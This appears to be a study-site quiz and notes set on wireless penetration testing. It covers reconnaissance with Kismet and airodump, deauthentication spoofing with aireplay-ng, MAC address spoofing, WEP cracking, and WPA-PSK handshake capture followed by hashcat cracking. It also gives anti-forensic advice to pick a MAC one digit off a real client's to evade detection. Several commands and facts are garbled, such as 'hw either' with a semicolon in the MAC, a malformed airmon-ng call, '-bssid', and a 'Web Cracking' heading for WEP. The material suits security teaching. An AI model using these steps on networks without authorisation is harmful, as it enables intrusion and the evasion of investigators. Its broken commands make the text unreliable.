Remote Targeting Techniques - Part Two

Questions and Answers

What types of networks should be reviewed when analyzing data during Phase III of Remote Targeting?

WPA-Enterprise, Open networks, Captured packers, and Probing clients

WEP, Captured packets, Rogue access points, and Associated clients

WEP, WPA2-Personal, WPA-Enterprise, and hidden networks

WEP, WPA-PSK, WPA-Enterprise, and captured packets (correct)

Which file formats can Kismet and airodump log data into for further analysis?

CSV and JSON files

PCAP and XML files (correct)

HTML and MKV files

TXT and PDF files

What information can be derived from the probing clients feature during wireless reconnaissance?

Determination of the total number of packets sent

Identification of network equipment manufacturers

Detection of all cloaked networks in the vicinity

Indication of potential client device ownership (correct)

What does the OUI of a MAC address signify in wireless reconnaissance?

A unique identifier assigned to network device manufacturers

What action can be taken to potentially identify cloaked networks during analysis?

Spoof a disassociation message to force association

What is a key consideration when selecting a location for stealth physical reconnaissance?

It should be in a public or common area.

Which of the following methods can be used for wireless recon targeting vulnerabilities?

Cracking WEP encryption.

What technique can be employed to maintain anonymity in an active wireless attack?

Changing the MAC address of the radio device.

During wardriving, what should a person be aware of regarding their surroundings?

Any observable actions may arouse suspicion.

What is the purpose of using devices like phones or tablets in a stealth physical recon?

To remotely connect for reconnaissance purposes.

What is the correct method to change a MAC address using a Linux terminal?

Use the command root@kali:~# ifconfig wlan0 down hw either 22;44:66:11:22:23.

Which strategy can be implemented to interfere with forensic investigations in wireless activities?

Setting the MAC address to be one digit different from a valid client MAC.

What is the purpose of the aireplay-ng command exemplified in the message spoofing?

To disassociate client devices without detection

Why is it essential to enumerate client info after wireless recon?

To identify the organization's client devices for targeted attacks

Which protocol is NOT mentioned as potentially revealing client device information?

FTP

What foundational strategy should one adhere to during stealth physical reconnaissance?

Maintain a low profile and act congruently with your narrative

In which situation would it be necessary to perform client enumeration?

When the identity of the network is ambiguous or unverified

What critical information might a DHCP request reveal?

Device hostname

Which element is emphasized as part of effective stealth during physical recon?

Acting congruently with a preplanned story

What is the primary advantage of capturing packets during wireless recon?

To obtain data indicative of device ownership and types

The OUI of a MAC address consists of the first six decimal digits.

False

Both Kismet and airodump are capable of logging data to PCAP files for analysis.

True

Any client device will always probe for other configured networks while connected to a single network.

False

Spoofing a disassociation message can aid in identifying cloaked networks during wireless reconnaissance.

True

A captured packet log will often contain the total number of packets sent from each device.

True

The aireplay-ng command can be used to send a disassociation message that appears legitimate to the client device.

True

The NetBIOS protocol can only reveal the internet protocol address of the client device.

False

Performing wireless reconnaissance does not require any physical presence.

False

Capturing packets during wireless network recon can assist in identifying the ownership of client devices.

True

The DHCP protocol does not provide any device-specific information.

False

To maintain anonymity during wireless attacks, it is crucial to adhere to the APT strategy of KISS.

True

Social engineering techniques have no relevance in the context of wireless reconnaissance.

False

Client device information can also be derived from HTTP requests which may show server names in cleartext.

True

Aerial drones are commonly utilized by private individuals for stealth physical reconnaissance.

False

Cracking WEP is one of the major vulnerabilities targeted during active wireless attacks.

True

Changing your MAC address is a complex process that cannot be done from a Linux terminal.

False

Wardriving can only be conducted from a parked vehicle.

False

It is recommended to set your MAC address to match exactly one of the valid client MAC addresses during active recon.

False

Multiple wireless vendor vulnerabilities are not significant in identifying weaknesses within wireless networks.

False

To maintain anonymity during wireless activities, using a MAC address differing by only one digit is an effective strategy.

True

Study Notes

Phase III: Remote Targeting - Part Two

• This phase involves reviewing data from reconnaissance for useful information.
• Wireless networks are categorized by their security protocol:
  • WEP (Wired Equivalent Privacy)
  • WPA-PSK (WPA Pre-Shared Key Mode)
  • WPA-Enterprise (WPA Enterprise Mode)
• Captured packets and associated clients are also examined.
• Tools like Kismet and airodump log PCAP files for analysis using Wireshark.
• PCAP files provide basic information, including:
  • BSSID (Basic Service Set Identifier)
  • Client devices
  • Associated clients
  • Probing clients
  • Channels
• Tools log additional data, including:
  • Timestamps of client and network activity
  • Packet counts from each device
  • Packets observed
  • Wireless networks probed by a client device
• This information helps identify potential target organization clients.
• Probed networks may indicate client ownership.
  • If a probe for a known employee's network is seen, it may suggest the owner.
  • Not all clients probe all networks.
• SSID (Service Set Identifier) information can be helpful in identifying the target organization.
• OUI (Organizationally Unique Identifier) of the MAC address's BSSID is recorded.
• OUI is the first six hexadecimal digits assigned to network equipment manufacturers for identification.
• Cloaked networks require enumeration efforts.
• Spoofing disassociation messages forces association process enumeration using aireplay-ng.

Active Recon II

• Changing MAC addresses is necessary for active attacks.
• The command format for MAC address change in a Linux terminal is: ifconfig wlan0 down, followed by ifconfig wlan0 down hw ether <MAC address>, and ending with ifconfig wlan0 up.
• Example usage for MAC address to 22:44:66:11:22:23:
  • root@kali:~# ifconfig wlan0 down
  • root@kali:~# ifconfig wlan0 down hw ether 22:44:66:11:22:23
  • root@kali:~# ifconfig wlan0 up
• Use of a different card is recommended if possible.

Active Wireless Attacks

• Major vulnerabilities in wireless networks include:
  • WEP cracking
  • Offline brute-forcing of WPA pre-shared keys
  • Active brute-forcing of WiFi Protected Setup
  • Multiple wireless vendor vulnerabilities
• MAC address changes are important for active attacks.
• Spoofing a valid client MAC address helps evade detection; use a one-digit offset

Web Cracking

• WEP cracking relies on packet capture.
• Packet counts vary, typically between 2,000-200,000 packets.
• Passive methods to crack WEP might take 15+ minutes to crack, requiring about 20,000 packets.
• Airodump is a good tool for initial packet capture.
• The airmon-ng command is needed to put the network interface into monitor mode.
• Example command format: root@kali : ~# airmon-ng start wlan.

WPA Preshared Key Cracking

• WPA-PSK vulnerabilities are often exploited by brute-forcing offline.
• Capturing four-way authentication handshakes between client and access point is critical.
• Default WPA pre-shared keys on residential access points are less secure.
• airodump-ng is used to monitor network traffic.
• The command to capture traffic is typically shown as airodump-ng -w <filename> -c <channel> -bssid <BSSID> mon0 for default.
• If needed, spoofing disassociation messages can be used to force re-association.
• Create a wordlist using relevant information (company name, phone numbers, etc).
• hashcat can be utilized for cracking.

Description

Explore the critical aspects of Phase III in Remote Targeting, focusing on the review of reconnaissance data. This phase emphasizes understanding wireless network security protocols, analyzing captured packets, and the use of tools like Kismet and Wireshark for effective network analysis.